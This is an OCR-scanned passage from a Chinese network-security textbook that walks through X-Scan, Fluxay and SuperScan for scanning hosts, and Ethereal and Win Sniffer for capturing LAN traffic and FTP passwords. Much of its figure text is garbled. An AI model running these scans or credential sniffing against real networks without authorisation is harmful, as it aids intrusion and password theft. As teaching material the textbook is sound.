会 先 ping 一 下 主机 ,如 果 该 主机 没有 响应 则 将 其 跳 过 (本 案例 中 选择 该 选项 ); 如 果 选 中 “无 条 
件 扫描 ” 单 选 按钮 ,X-Scan 扫描 器 就 会 强制 地 扫描 ,无 论 被 扫描 的 主机 是 否 响 应 ; 选中 * 跳 过 没 
有 检测 到 开发 端口 的 主机 ” 复 选 框 , 则 在 遇 到 没有 开放 端口 的 主机 时 会 自动 跳 过 该 主机 。 

(3) 插件 设置 。 选 中 “插件 设置 ”选项 中 的 “SNMP 相关 设置 ”选项 ,在 该 选项 中 用 户 可 
以 设置 需要 检测 的 SNMP 信息 种 类 ,这 些 信息 种 类 会 在 对 话 框 的 右 侧 窗 格 中 被 列 出 ,用 户 
只 需 选 中 相应 种 类 前 面 对 应 的 复 选 框 即 可 ,如 图 4-4 所 示 。 为 了 计算 机 的 安全 ,建议 用 户 将 
所 有 的 复 选 框 选中 。 


检测 以 下 SNIE 信 息 : 


辟 月 
YY 获 职 IP 信 息 
要 和 


UDP 
总 人 We 


CD 


4-4 SNMP 设置 
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步骤 二 ,开始 扫描 。 
选择 菜单 栏 “ 文 件 ”>“ 开 始 扫 描 ”, 开 始 对 设置 好 的 目标 主机 进行 扫描 。 或 者 选择 工具 
栏 上 的 “开始 ”图 标 ,如 图 4-5 所 示 。 


四 
文件 中， 设 千 昌 查看 儿 工具 
|@l ml| 图 


田 - 罗 219 246.5 198 


当前 进度 
1 正在 检 柚 "TIS 编码 /解码 漏洞 ”. . 
1 ”正在 检测 -IIS 辆 码 /解码 漏洞 
5 正在 检测 "FT] a 7 


田 马 219.246.5.206 
回信 219.246.5 188 
田 马 219.246.5 197 


加 局 219.246.5 209 


由 - 曼 219 246.5 211 
由 僵 219.246.5.212 
由 而 219 .246.5 221 
由 多 219.246.5 222 


由 蜀 219. 246.5 224 a 
四 
[219. 246. 5. 224] WetBio: 
[219. 246. 5. 224] 人 
[219. 246. 5. 224] 
[219. 246. 5. 224] 
[219. 246. 5. 224] 琵 
[219. 246. 5. 224: 
[219. 246. 5. 224] 这 = 
| 二 246.5. a 了 Bt 口令 
(219. 246. 5. 224; 
[219. 246. 5. 224] EE 中 Ts 所 a EE 
1 加 
| | Active/MWaximum host thread: 5/10, Current/Meximun thread: 9/100, Time(s): 61 及 


图 4-5 开始 扫描 
步骤 三 ,查看 扫描 报告 。 
选择 “查看 ”一 “检测 报告 ”, 打 开 扫 描 报 告 。 在 扫描 完成 后 ,此 网 页 会 自动 弹出 。 系 统 中 
的 漏洞 会 用 红色 字体 显示 ,如 图 4-6 所 示 。 另 外 ,在 网 页 的 “安全 漏洞 及 解决 方案 ”一 栏 中 ， 
可 以 看 到 安全 漏洞 的 类 型 端口 ,解决 方案 。 本 例 中 为 “FTP(21/tcp) 弱 口令 ”漏洞 。 


访 口 /服务 
netbios-ssn (139/tcp) | 
ww ohcp) 发 现 安全 提示 


Rp 21hep) | 发 现 安全 漏 油 
epmap (135Ncp) | 发 现 安全 提示 
Detwork blackiack (102S5Acp) | 发 现 安全 提示 

domain Gaftcp) | 发 现 安全 提示 


图 4-6 查看 扫描 报告 


2. 流光 Fluxay 

1) 流光 Fluxay 简介 

流光 是 国内 高 手 小 榕 精心 打造 的 综合 扫描 器 ,事实 上 ,无 论 国 内 国外 ,流光 都 算是 非常 
优秀 的 扫描 工具 之 一 。 它 功能 强大 .不仅 能 够 完成 各 种 扫描 任务 ,而 且 自 带 了 许多 猜 解 器 和 
入 侵 工具 。 这 款 工具 可 以 让 一 个 只 会 点 击 鼠 标的 人 成 为 专业 的 黑客 ,这 样 说 一 点 也 不 夸张 。 
流光 目前 的 漏洞 扫描 包括 : POP3、FTP、IMAP、Telent、MS SQL MySQL 、Web .IPC、RPC 
和 DAEMON 等 。 

2) 系统 要 求 

流光 5. 0 必须 运行 于 Windows 2000 以 上 或 者 Windows NT 系统 中 ,内 存 不 小 于 128MB。 
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某 些 功能 需要 网 络 适 配器 (必需 ) 。 

案例 4-2 ”使 用 流光 高 级 扫描 功能 检测 目标 主机 的 缺陷 

与 X-Scan 相 比 ,流光 的 功能 更 多 一 些 , 但 操作 起 来 难免 繁杂 。 由 于 流光 的 功能 过 于 强 
大 ,而 且 功 能 还 在 不 断 扩充 中 ,因此 流光 的 作者 小 榕 限制 了 流光 所 能 扫描 的 IP 范围 ,不 允许 
流光 扫描 国内 IP 地 址 ,而 且 流 光 测 试 版 在 功能 上 也 有 一 定 的 限制 。 但 是 ,入 侵 者 为 了 能 够 
最 大 限度 地 使 用 流光 ,在 使 用 流光 之 前 ,都 需要 用 专门 的 破解 程序 对 流光 进行 破解 ,去 除 IP 
地 址 范围 和 功能 上 的 限制 。 本 例 中 使 用 的 流光 5.0 就 取消 了 国内 IP 限制 而 且 免 费 。 

打开 流光 后 ,界面 如 图 4-7 所 示 。 


小 榕 软件 -【 流 光 5- 0】 Build 3310 《0 用 户 ) 
文件 中 ) 编辑 下 ) 查看 入 探测 人 B) 选项 人 0) 
区 FE 


口 首 Fr 主机 让 
口 @ hrp 主 机 司 

口 特 poxv 主 机 
口 加 Fopm 主机 


Www netyeyes ,org 各 
有 关 使 用 中 的 问题 , 在 [帮助 ] 中 都 有 详细 党 明 ,请 


“+ 此 版 本 支持 HTTP BASICINEGOTIATEINTLM 身 份 验证 方法 *** 


< 


[ET | 


主机 


ftp any@any.net 219.246.5.221 

ftp any@any.net 219.246.5.221 

ftp any@any.net 219.246,5.221 
< > 
上 一 | 用 户 | 单间 | 线程 | 拆 8 度 | [sr | 

图 4-7 流光 界面 


使 用 流光 高 级 扫描 功能 检测 目标 主机 缺陷 的 操作 步骤 分 为 以 下 4 个 步 又 。 

步骤 一 ,打开 高 级 扫描 向 导 , 设 置 扫描 参数 。 

在 流光 5.0 主 界面 下 ,通过 选择 “文件 ”一 “高 级 扫描 向 导 ” 或 使 用 快捷 键 Ctrl 十 W 打开 
高 级 扫描 向 导 。 

首先 设置 IP 地 址 。 如 图 4-8 所 示 , 在 “起 始 地 址 ”和 “结束 地 址 ”文本 框 中 分 别 填 入 目标 
网 段 主机 的 开始 和 结束 IP 地 址 。 本 例 中 选择 一 台 主 机 进行 扫描 ,“ 起 始 地 址 ”和 “结束 地 址 ” 
文本 框 都 填 人 “219. 246. 5. 221”。 如 果 需 要 扫描 某 一 段 网 络 范围 的 IP 地 址 ,那么 ,在 “起 始 
地 址 ”和 “结束 地 址 ”文本 框 中 分 别 输入 相应 的 IP 地 址 即 可 。 

然后 ,在 “目标 系统 ”中 选择 预 检测 的 操作 系统 类 型 。 例 如 ,选择 ALL 就 代表 选择 所 有 
类 型 的 操作 系统 。 在 “检测 项 目 ” 中 , 单 击 “ 全 选 ” 按 钮 。 其 中 包括 要 检测 的 端口 和 各 种 类 型 
的 协议 。 选 好 后 如 图 4-8 所 示 。 

其 次 单 击 “ 下 一 步 ” 按 钮 ,在 图 中 选中 “标准 端口 扫描 ” 复 选 框 ,如 图 4-9 所 示 。 这 里 需要 
指出 的 是 , “标准 端 口 扫 描 ” 选 项 只 对 常见 的 端口 进行 扫描 。“ 自 定 端口 扫描 范围 "是 指 对 自 
定义 端口 范围 进行 扫描 。 
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PoRTS 区 


二 


Pas 246.5.221 


AL | 
园区 加 主机 各 口 FTN 检 查 
(€W lia 
回合 PoTs 
加 Srors 时 
回 @rm 

3 


口 自 定 端 口 扫描 范围 


Op 3TTEEEET 


| | 《上 - 步 四 [下 - 步 四 让 am | 各 | 
图 4-8 设置 扫描 参数 图 4-9 端口 设置 


端口 设置 好 后 ,连续 单 击 “ 下 一 步 ” 按 钮 ,出 现 
如 图 4-10 所 示 界 面 ,选择 “本 地 主机 ”( 默 认 ), 表 示 | 主 术 
使 用 本 机 执行 扫描 任务 。 

步骤 二 ,开始 扫描 。 

在 图 4-10 中 单 击 “ 开 始 ? 按 钮 进行 扫描 。 在 扫 
描 过 程 中 ,如 果 想 要 停止 ,通过 单 击 * 取 消 ?按钮 来 
实现 ,不 过 需要 相当 一 段 时 间 才 能 真正 地 停止 ,所 
以 建议 一 次 不 要 扫描 太 大 的 网 段 。 

步骤 三 ,查看 扫描 报告 。 

扫描 结束 后 ,流光 会 弹出 一 个 对 话 框 , 询 问 是 否 查看 扫描 报告 ,默认 会 自动 打开 HTML 
格式 的 扫描 报告 ,如 图 4-11 所 示 。 

@ WV 所 六 报关 - 360 安 ,，。 文件 E) 炉 柱 (E) 查看 (V) 收藏 (A) I(T) WWU) 。 会合 合 
-O00 oan .qs D @ 
后 前 进 。 停止 局 新 主页 拱 锦 


*《 畏 西 360 新手 求助 咒 德州 扑克 >» 热 扶 厌 需 图 世 口 的 收 荣 访 设 置 耻 无 证 训 览 
器 人 字 > 


图 4-10 选择 流光 主机 


219.246.5.221 
端口 扫描 
80(HTTP) 

21(FTP Contro 
53(BIND 


139(SMB 


FTP 扫 描 
FTP 版 本 信息 : Microsoft FTP Service 


区 许 匿名 登录 


CG1I 扫 描 
WEB 版 本 信息 ; Microsoft-I15/6.0 
扫 撕 成 功 c6I 漏 油 

国 


[3 


入 
如 加 傅 遇 100% - 


图 4-11 流光 扫描 报告 
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步骤 四 ,根据 扫描 结果 连接 目标 主机 。 

可 以 看 出 ,在 扫描 完成 后 ,流光 不 仅 把 扫描 结果 整理 成 报告 文件 ,而 且 还 把 可 利用 的 主 
机 列表 显示 在 流光 界面 的 最 下 方 。 单 击 主机 列表 中 的 主机 便 可 以 直接 对 目标 主机 进行 连接 
操作 ,如 图 4-12 所 示 。 


219.246.5.221 
219,246.5,221 
219.246.5.221 


ooo)ool100| 。 探测 速度 


图 4-12 ”连接 目标 主机 
登录 目标 主机 后 ,如 图 4-13 所 示 。 


© C:\WINDOYS\systen32\ftp. exe [-Io[x| 
tp> Open 219.246.5.221 
onnected to 219.246.5.221. 

P20 Microsoft FIP Service 

ser (219.246.5.221:Cnone)): 

B31 Anonynous access alloved。 send identity Co-nail nane) as password. 


P30 Anonynous user logged in. 

tp> 1s -1 

pag PORT connand successful. 

hse Opening hSCII mode data connection for /bin/1s. 

a : 18 123.txt 
185344 FIP.doc 
428832 server 2983 dns.doc 

<DIR> 上 传 区域 

<DIR> 下 载 区 域 

596368 在 Windows 2993 上 安 专著 WEB 服 务 .doc 

489768 在 Windows 2883 上 安装 phcP 服 务 .doc 

P26 Transfer conplete- 

tp; 收 到 492 字 节 ， 用 时 8.88Seconds 492998.BBKhyteszvsec - 

tp> 


图 4-13 登录 目标 主机 


另外 ,除了 使 用 “高 级 扫描 向 导 ” 配 置 高 级 扫描 外 ,还 可 以 直接 选取 高 级 扫描 工具 。 选 择 
菜单 栏 的 “探测 ”一 “高 级 扫描 工具 ”命令 即 可 。 

这 里 所 介绍 的 只 是 流光 功能 的 一 小 部 分 ,其 他 一 些 功能 希望 使 用 者 在 使 用 的 过 程 中 自 
己 摸索 。 流 光 扫 描 器 自身 的 设置 是 比较 复杂 的 ,有 很 多 选项 可 以 自由 设 定 , 因 而 也 给 使 用 者 
更 大 的 发 挥 空间 。 

3. SuperScan 

1) SuperScan 简介 

SuperScan 是 一 款 IP 和 端口 扫描 软件 ,扫描 速度 极 快 而 且 资 源 占用 很 小 。 该 工具 为 
Foundstone Security Consultants 上 的 免费 工具 ,最 新 版 本 SuperScan 4.0 可 以 在 http:// 
www. foundstone. com 下 载 , 直接 解压 就 可 以 使 用 ,没有 安装 程序 ,是 一 款 绿色 软件 。 
SuperScan 4. 0 版 本 可 以 扫描 UDP 和 TCP 端口 ,还 可 收集 丰富 的 系统 识别 信息 。 

2) 系统 要 求 

SuperScan 4.0 只 能 在 Windows XP、Windows 2000、Windows 2003 或 Windows 2008 


92 网 络 安全 教程 及 实践 


上 运行 。 
案例 4-3 ”Windows 下 使 用 SuperScan 扫描 某 一 网 段 主机 
首先 双击 打开 SuperScan4. exe,SuperScan 4. 0 启动 界面 如 图 4-14 所 示 。 


3 SuperScan 4-0 


Scan | Host and Service Discovery| Scan Options | Took | windows Enumeration | Abou | 


Ips i = 
Hostname/IP ?| [sate EndP ClearSelected 
Statlp X 

[5 SE 全 Ee 


EndlP | 


ReadiPsiomme 之 | 


lel View HTML Resuts 


图 4-14 ”SuperScan 4.0 启动 界面 


在 Windows 下 使 用 SuperScan 扫描 某 一 网 段 主 机 可 以 分 为 以 下 两 个 步 又 。 

步 又 一 ,设置 扫描 参数 。 

(1) 设置 扫描 IP 地 址 范围 。 打 开 后 ,选择 Scan 选项 卡 。 如 果 要 扫描 单一 主机 ,就 在 
Hostname/IP 栏 里 添上 IP 地 址 。 如 果 要 扫描 某 一 网 段 的 主机 ,就 在 Start IP 和 End IP 栏 
里 分 别 添上 起 始 和 结束 IP, 添 加 完成 后 , 单 击 后 面 的 ”-> “图标 ,如 图 4-15 所 示 。 

(2) 选择 Host and Service Discovery 选项 卡 ,可 以 设置 查找 主机 的 方法 和 需要 扫描 的 
端口 。 还 可 以 调整 扫描 类 型 和 超时 时 间 。 界 面 如 图 4-16 所 示 。 

由 图 4-16 可 以 看 出 ,SuperScan 有 4 种 可 用 的 ICMP 查找 主机 的 方法 。 选 择 Echo 
Request 选项 时 ,表示 当 防 火 墙 阻塞 ICMP 回应 请 求 时 ,不 会 阻塞 其 他 诸如 时 间 标 签 请 求 等 
ICMP 报 文 。SuperScan 在 默认 情况 下 建立 了 大 多 数 常用 的 UDP 和 TCP 端口 列表 。 可 以 
单 击 Restore Defaults 按钮 加 载 默认 的 端口 列表 。 另 外 ,Scan Options 选项 卡 可 以 控制 诸如 
名 称 解析 和 标准 获取 等 任务 。Tools 选项 卡 包 含 大 量 工 具 用 于 执行 常用 的 网 络 查询 。 
Windows Enumeration 选项 卡 是 SuperScan 最 强 的 特点 之 一 。 

步骤 二 ,扫描 并 查看 结果 。 

参数 设置 好 后 ,返回 Scan 选项 卡 , 单 击 左 下 方 蓝 色 的 三 角 按钮 ,启动 扫描 。 扫 描 结束 后 
界面 如 图 4-17 所 示 。 


Took | Windows Enumeration | About | 


BED 92 281 > 


ReadlPsfromfle 之 


View HTML Resuls 


图 4-15 设置 扫描 IP 范围 


Scan 。 Host and Service Discovery | Scan Options | Tools | Windows Enumeraton | Abou | 


Hout discovery Echo Request Timeout ml [2000 
厂 Timestamp Request 
厂 Addess Mask Request 
厂 Infomakion Request 


FS UDP port scan Limeout Ims) [2000 
1 
Stat pon 7 .| Scanype 6G Dala Data+ICMP 
Endpot [1025 32768.32790 
43981 
Readports hom fle > | |71025 人 pn 
ClearSelected | 。 CearAl 
WS TCP port scan Timeout Imal [4000 
7 Een 
i 二 | 127374 Scantype ( Connect (® SYN 
ndport 1025 30821 
32768.32790 厂 Use static 
Readports homfie > | |7105 局 ee 


Bestore Defauks 


IReady 


4-16 ”Host and Service Discovery 选项 设置 


在 中 间 窗 口 ,可 以 看 到 在 各 个 操作 系统 上 发 现 的 主机 和 端口 的 内 容 。 最 下 面 的 窗口 提 
供 了 SuperScan 扫描 过 程 的 详细 日 志 。 单 击 View HTML Results 按钮 ,可 以 查看 扫描 结 
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Scan |Host and Service Discovery | Scan Opiions | Tools | Windows Enumeration | About | 
IPs 


Hostname/IP 2| 
siatlp X23 25 5 170 
Emp X|F5 mm 5 


ReadIPshomfie 之 | 


Pertorming hoscname resolution... 
Dertorming banner grabs... 
TCP banner grabbing (0 ports) 
UDP banner grabbing (9 ports) 


Discovery scan finished: 07/25/09 20:09:08 


BI Fee 
:19 Saved log file live 7 rcp oem 0 MP open: 9 [52/52 done 
图 4-17 扫描 结束 


果 。 扫 描 结果 如 图 4-18 所 示 。SuperScan 扫描 报告 可 以 获取 系统 的 MAC 地址 、NetBIOS 
的 名 称 表 、 主 机 所 在 工作 组 等 信息 。 


文 全 多 柱 E】 查看 (V) 家 珊 (&) 工具 (I) WL) 


De 


交 施 郑 360W 竹 沁 助 的 条 人 站 克 他 锡 旨 冰毒 【四 调 席 问答 全 问 址 大 全 的 人 内 戏 六 当时 赂 部 四 项 口 和 tk 只 广 议 置 局 无 商 间 | 
日 


图 4-18 ”SuperScan 扫描 报告 
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除了 这 些 扫描 工具 外 ,还 有 许多 功能 强大 的 工具 软件 如 X-way、Shadow Security Scanner、 
Nmap 和 LANguard Network Scanner 等 。 


4.5 网 络 监听 


网 络 监听 可 以 在 网 上 的 任何 一 个 位 置 实施 ,如 局 域 网 中 的 一 台 主 机 、 网 关上 或 远程 网 的 
调制 解 调 器 之 间 等 。 网 络 监 听 可 能 造成 的 危害 包括 以 下 4 个 方面 。 

(1) 能 够 捕获 口令 。 

(2) 能 够 捕获 专用 的 或 者 机 密 的 信息 。 

(3) 可 以 用 来 危害 网 络 邻 居 的 安全 ,或 者 用 来 获取 更 高 级 别 的 访问 权限 。 

(4) 分 析 网 络 结构 ,进行 网 络 渗透 。 

在 网 络 中 通信 时 ,车 利用 工具 ,将 网 络 接 口 设置 在 监听 模式 , 便 可 将 网 络 中 正在 传播 的 
信息 截获 ,从 而 进行 攻击 。 网 络 监听 技术 的 初 囊 是 提供 给 网 络 安全 管理 人 员 进 行 管理 的 工 
具 , 可 以 用 来 监视 网 络 的 状态 .数据 流动 情况 以 及 网 络 上 传输 的 信息 等 。 现 在 ,网 络 监 听 技 
术 作 为 一 种 工具 ,总 是 扮演 着 正 反 两 方面 的 角色 ,尤其 在 局 域 网 中 ,这 种 表现 更 为 突出 。 对 
于 入 侵 者 来 说 ,通过 网 络 监听 可 以 很 容易 地 获得 用 户 的 关键 信息 。 当 信息 以 明文 的 形式 在 
网 络 上 传输 时 ,只 要 将 网 络 接口 设置 成 监听 模式 , 便 可 以 源源 不 断 地 将 网 上 传输 的 信息 截 
获 。 而 对 于 入 侵 检测 和 追踪 者 来 说 ,网 络 监听 技术 又 能 够 在 与 入 侵 者 的 斗争 中 发 挥 重 要 的 
作用 ,因此 他 们 也 常常 采取 网 络 监听 技术 来 防范 黑客 的 非法 入 侵 。 


4.5.1 网 络 监听 简介 


网 络 监听 (Network Listening) 也 称 网 络 嗅 探 (Network Sniffing)。 网 络 监 听 的 目的 是 
截获 通信 的 内 容 ,监听 的 手段 是 对 协议 进行 分 析 。 

在 网 络 上 ,监听 效果 最 好 的 地 方 是 在 网 关 、 路 由 器 .防火墙 之 类 的 设备 处 ,通常 由 网 络 管 
理 员 来 操作 。 对 于 一 个 施行 网 络 攻击 的 人 来 说 ,能 攻破 网 关 、 路 由 器 防火墙 的 情况 极为 少 
见 , 在 这 里 完全 可 以 由 安全 管理 员 安 装 一 些 设备 ,对 网 络 进行 监控 ,或 者 使 用 一 些 专 门 的 设 
备 , 运 行 专门 的 监听 软件 ,并 防止 任何 非法 访问 。 然 而 ,潜入 局 域 网 中 一 台 不 引 人 注 意 的 计 
算 机 中 ,悄悄 地 运行 一 个 监听 程序 ,这 是 大 多 数 黑客 的 做 法 。 

网 络 监听 原理 : 人 们 通常 所 说 的 Packet Sniffer 指 的 是 一 种 插入 到 计算 机 网 络 中 的 偷 
听 网 络 通信 的 设备 ,就 像 是 电话 监控 能 听 到 其 他 人 通过 电话 的 交谈 一 样 。 与 电话 线路 不 同 ， 
计算 机 网 络 是 共享 通信 通道 的 。 共 享 意味 着 计算 机 能 够 接收 到 发 送 给 其 他 计算 机 的 信息 。 
捕获 在 网 络 中 传输 的 数据 信息 就 称 为 Sniffing( 窃 听 )。 

和 电话 窃听 相 比 ,Sniffer 有 一 个 好 处 是 : 许多 网 络 用 的 是 “共享 的 介质 *。 在 局 域 网 中 
与 其 他 计算 机 进行 数据 交换 的 时 候 , 发 送 的 数据 包 发 往 所 有 连 在 一 起 的 主机 ,也 就 是 广播 ， 
在 报头 中 包含 目标 机 的 正确 地 址 ,所 以 只 有 与 数据 包 中 目标 地 址 一 致 的 那 台 主 机 才 会 接收 
数据 包 , 其 他 的 机 器 都 会 将 包 丢 弃 。 但 是 ,当主 机 工作 在 监听 (又 称 混杂 ) 模 式 下 时 ,无 论 接 
收 到 的 数据 包 中 目标 地 址 是 什么 ,主机 都 将 其 接收 下 来 。 然 后 对 数据 包 进 行 分 析 从 而 得 到 
局 域 网 中 通信 的 数据 。 由 于 在 一 个 普通 的 网 络 环境 中 ,账号 和 口令 信息 以 明文 方式 在 以 太 
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网 中 传输 ,一 旦 入 侵 者 获得 其 中 一 台 主 机 的 root 权限 ,并 将 其 置 于 混杂 模式 以 窃听 网 络 数 
据 , 便 有 可 能 入 侵 网 络 中 的 所 有 计算 机 。 注 意 ,一 台 计 算 机 可 以 监听 同一 网 段 所 有 的 数据 
包 , 不 能 监听 不 同 网 段 的 计算 机 传输 的 信息 。 


4.5.2 常用 网 络 监听 工具 


常用 的 网 络 监听 工具 主要 有 Ethereal 和 Win sniffer 等 。 

1. Ethereal 

1) Ethereal 简介 

Ethereal 是 当前 非常 流行 的 一 种 数据 包 监 听 软 件 。Ethereal 具有 设计 完美 的 图 形 化 界 
面 和 众多 分 类 信息 及 过 滤 选 项 。 用 户 通 过 Ethereal, 同 时 将 网 卡 设置 为 混杂 模式 ,可 以 查看 
到 网 络 中 发 送 的 所 有 通信 流量 。Ethereal 应 用 于 故障 修复 、 分 析 、 软 件 和 协议 开发 以 及 教育 
领域 ,是 一 种 开放 源 代码 的 许可 软件 ,允许 用 户 向 其 中 添加 改进 方案 。 

因为 Ethereal 基于 WinPcap, 所 以 Ethereal 0. 99. 0 之 前 的 版 本 必须 要 另行 下 载 安 装 
WinPcap。 之 后 的 版 本 都 不 用 另外 下 载 安装 ,因为 WinPcap 已 经 被 封装 在 Ethereal 里 面 了 。 

2) 系统 要 求 

Ethereal 适用 于 当前 所 有 较为 流行 的 计算 机 系统 ,包括 UNIX、Linux 和 Windows。 用 
户 可 以 到 http://www. ethereal. com/ 上 下 载 该 软件 。 

案例 4-4 Windows XP 下 使 用 Ethereal 捕获 并 分 析 局 域 网 内 的 数据 包 

Windows XP 下 使 用 Ethereal 0. 10. 10 捕获 并 分 析 局 域 网 内 的 数据 包 分 为 以 下 三 个 步骤 。 

第 一 步 ,Capture Options 设置 。 

双击 启动 桌面 上 的 Ethereal 图 标 图 以 后 ,选择 菜单 Capture 习 Start。 进 行 Capture 
Options 设置 ,如 图 4-19 所 示 。 


Capture 
Interface: |Broadcom Netxtreme Gigabit Ethemet Driver. WDeviceINPF_{3847E6C8-897E-4( 4 
IP address: 219.246.5.94 
srtype | Etheme! ~ |Burer size:[1 § megabytels) 
回 Capture packets in promiscuous mode 
口 Umit each packetto 6 bytes 
(anal 9 


Capture File(s) Display Options 


Fie: | 口 Update list of packets in real tme 
口 Use muitiple fles 


Nextfile every ebbet Autornatic scrolling In Iive capture 


Next 


Ring 
Name Resolution 


Stop captur 


Stop Capture 回 Enable MAC name resolution 


人 | 口 Enable network name resolution 
口 -ater | | Hels 
OD.ater | | | minutecs 回 Enable transport name resolution 


[Er] na 


图 4-19 ”Capture Options 设置 
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(1) Capture Options 中 部 分 参数 设置 如 图 4-19 所 示 。 其 中 , 单 击 Interface 选择 捕获 
接口 ,这 里 选择 本 机 的 吉 比 特 以 太 网 卡 。Capture packets in promiscuous mode 表示 是 否 打 
开 混杂 模式 ,如 果 选 择 混杂 模式 表示 捕获 所 有 的 报 文 ,一 般 如 果 使 用 者 只 捕获 本 机 收发 的 数 
据 报 文 ,可 以 关 掉 。Limit each packet 表示 限制 每 个 报 文 的 大 小 。Capture Files 即 捕获 数 
据 包 保存 的 文件 名 以 及 保存 位 置 。 

(2) 设置 过 滤 规 则 。Capture Filter 是 抓 包 过 滤器 ,只 抓 取 满足 过 滤 规 则 的 包 。 如 果 要 
捕获 特定 的 报 文 , 那 在 抓 取 包 前 就 要 设置 过 滤 规 则 ,决定 数据 包 的 类 型 。 单 击 图 4-19 中 的 
Capture Filter 按钮 ,设置 过 滤 规 则 。 弹 出 如 图 4-20 所 示 的 窗口 。 

其 中 ,Filter name 可 以 任意 命名 。Filter string 中 输入 port not 53 and not arp, 此 过 滤 
规则 表示 捕获 所 有 除了 DNS 和 ARP 的 报 文 。 要 注意 ,这 里 的 Filter string 语法 输入 有 些 
技巧 ,如 ， 

。 捕获 MAC 地 址 为 00:aa:00:62:c6:09 的 网 络 设备 通信 的 所 有 报 文 : ether host 00: 

aa:00:62:c6:09。 
。 捕获 IP 地 址 为 219. 246. 5. 254 的 网 络 设备 通信 的 所 有 报 文 : host 219. 246. 5. 254。 
。 捕获 网 络 Web 浏览 的 所 有 报 文 : tcp port 80。 
。 捕获 219. 246. 5. 224 除了 HTTP 外 的 所 有 通信 数据 报 文 : host 219. 246. 5. 254 and 
not tcp port 80 。 

第 二 步 , 抓 包 。 

Capture Options 设置 完成 后 , 单 击 OK 就 开始 进行 抓 包 。 同 时 就 会 弹出 Ethereal: 
capture form(Cnic) driver, 其 中 Cnic) 代 表 本 机 的 网 卡 型 号 。 该 界面 还 会 以 百分比 统计 不 同 协 
议 捕获 到 的 报 文 ,如 图 4-21 所 示 。 


Ethereal: Capture Filter 


四 Ethereal: Capture froa Br... CE] 区 | 


[Captured Packets 
Total 
SCTP 
TCP 
UDP 


Delete 


Properties 


Filter name: new 


Filter stricG: | port not 53 and not arp 


00:01:56 


Help OK Save Close 


图 4-20 设置 过 滤 规 则 图 4-21 捕获 过 滤 


第 三 步 ,协议 分 析 。 
单 击 Stop 停止 后 ,界面 如 图 4-22 所 示 。 例 如 , 单 击 21 号 数据 包 , 就 可 以 看 见 该 数据 包 
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的 详细 信息 ,包括 时 间 、 源 IP、 目 标 卫 、 使 用 的 协议 和 端口 信息 等 。 中 间 的 方 框 内 还 有 详细 
的 以 太 口 信息 、IP 协议 信息 等 。 


(Untitled) — Etherea 


| Ele Edt View Go Capture Anayze Statistics Help 


国 [ 巴 回 x 多 


号 | 国 旬 守 吧 下 有 入 QH 四 是 头 廿 


Ener | 


] > Expression Clear apph 


aa Ethernet II, Src: 


Type: IP (0x080' 
rtenmet Rrotosd 


Version: 4 
Header length: 
国 Differentiated 


Identification: 
国 F1aqs: 0x00 


Destination: 00: 
Source: 00:18:8b:82:7c:a9 (00:18:8b:82:7c:a9) 
0) 

1，Src Ac 2 


Destination 3rotocol Info 
UDP Sour 
JDP So 


112> 3 UD De: 
219.246.5.94 Source port: 2393 
115.46.39.87 UDP Source port: 3261 


00:18:8b:82:7c:a9, Dst: 00:03:4b:4d:16:08 
03:4b:4d:16:08 (NortelNe_4d:165:08) 


20 bytes 
Services Field: 0x00 (CDscp 0x00: Default; ECN: 0x00) 


Total Length: 45 


0x5545 (21829) 


bd 19 0d 00 
030 50 21 0f 81 88 dd 07 28 dp Ba OF 


nternet Protocol (Ip), 20 bytes 


2. Win Sniffer 
1) Win Sniffer 简介 


图 4-22 协议 分 析 


Win Sniffer 专门 用 来 截取 局 域 网 内 的 密码 ,比如 登录 FTP、 登 录 E-mail 等 的 密码 。 


2) 系统 要 求 


本 案例 使 用 Win Sniffer 1.2 版 本 ,可 运行 在 Windows 9x/NT/2000/XP 操作 系统 中 。 
案例 4-5 Win Sniffer 监听 局 域 网 内 某 台 FTP 服务 器 密码 


使 用 Win Sniffer 监 
第 一 步 , 设 置 网 卡 。 


打开 Win Sniffer, 只 


Adapter, 设 置 网 卡 ,这 里 
第 二 步 ,连接 远程 下 
使 用 DOS 命令 行 连 
第 三 步 ,获取 密码 。 


监听 局 域 网 内 某 台 FTP 服务 器 密码 ,可 以 分 为 以 下 三 个 操作 步骤。 


要 做 简单 的 设置 就 可 以 进行 密码 抓 取 了 。 单 击 工 具 栏 图 标 
设置 为 本 机 的 物理 网 卡 就 可 以 ,如 图 4-23 所 示 。 

TP 服务 器 。 

接 远程 的 FTP 服务 ,如 图 4-24 所 示 。 


打开 Win Sniffer, 看 到 刚才 的 会 话 过程 已 经 被 记录 下 来 了 ,显示 了 会 话 的 一 些 基 本 信 


息 , 但 是 想 看 到 密码 需要 


购买 该 软件 ,如 图 4-25 所 示 。 


本 节 介 绍 了 两 个 网 络 监听 工具 , 旨 在 让 读者 了 解 一 些 常用 的 网 络 监 听 工具 。 此 外 ,还 有 


许多 常用 的 监听 软件 ,如 


Sniffer Pro、Dsniff、X-sniff、 嗅 探 经 典 Iris 等 。 


Win Sniffer 


Cheose 
[3] WAN 慨 漠 蔽 口 GFPTP) 
9| ] 瑟 芝 油 型 靖 口 7FOE) 


上 昌 AN 0 0 
tr 和 AN Em 


口 or] 4 
sper sky Anti-Virus NDIS Miniport 
[11] Kaspersky Anti-Virus NDIS Miniport 


Infornation 

Product Broadeon NetXtrene Gigabit Ethernet Driver 

Service \Device\ {304TE6C3-897E-44F3-655E-91241A254F6 
Basic properties 一 一 


Nediun: Ethernet 802.3 
Carrent 00. 18. 8B.82. 7C. A9 
Speed 100 MBPS 


图 4-23 设置 网 卡 


:\Docunents and Settings\hdninistrator?ftp 219.246.65.225 
onnected to 219.246.65.225. 
2 eady- - 全 
多 访问 兰 Noe 服务 吕 ， 成 菩 请 访问 http://ftp.1zu.edu.cn 
e 末 自 219.246.5.94 的 FTP 用户， 
ne July, 2809 21:24:13 


i 95 天 22 小 时 21 分 25 种 
ee ep 茶 统 启动 以 米 已 接 通 28247726 位 使 用 者 。 
去 24 外 194578 次 联机 。 
以 来 共 上 传 115338317 kb ， 共 下 载 ?879238423 kh 
党 二 124 kb 


相传 用 者 在 线 上 ， 最 多 容许 5ee 位 使 用 者 同时 联机 下 载 。 


lizhmB6B@lzu-cn 
20 


ser C219.246.65.225:Cnone)): anonynous 

31 User nane okay, please send conplete E-nail adidress as passvord. 
assword: 

38 User logged in, proceed. 

tp> 


4-25 获取 密码 
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4.6 网 络 扫描 与 监听 的 防范 措施 


4.6.1 


网 络 扫 描 的 防范 
防止 黑客 恶意 攻击 的 第 一 步 是 防范 网 络 扫 描 。 而 网 络 中 96% 的 扫描 集中 在 端口 扫描 。 
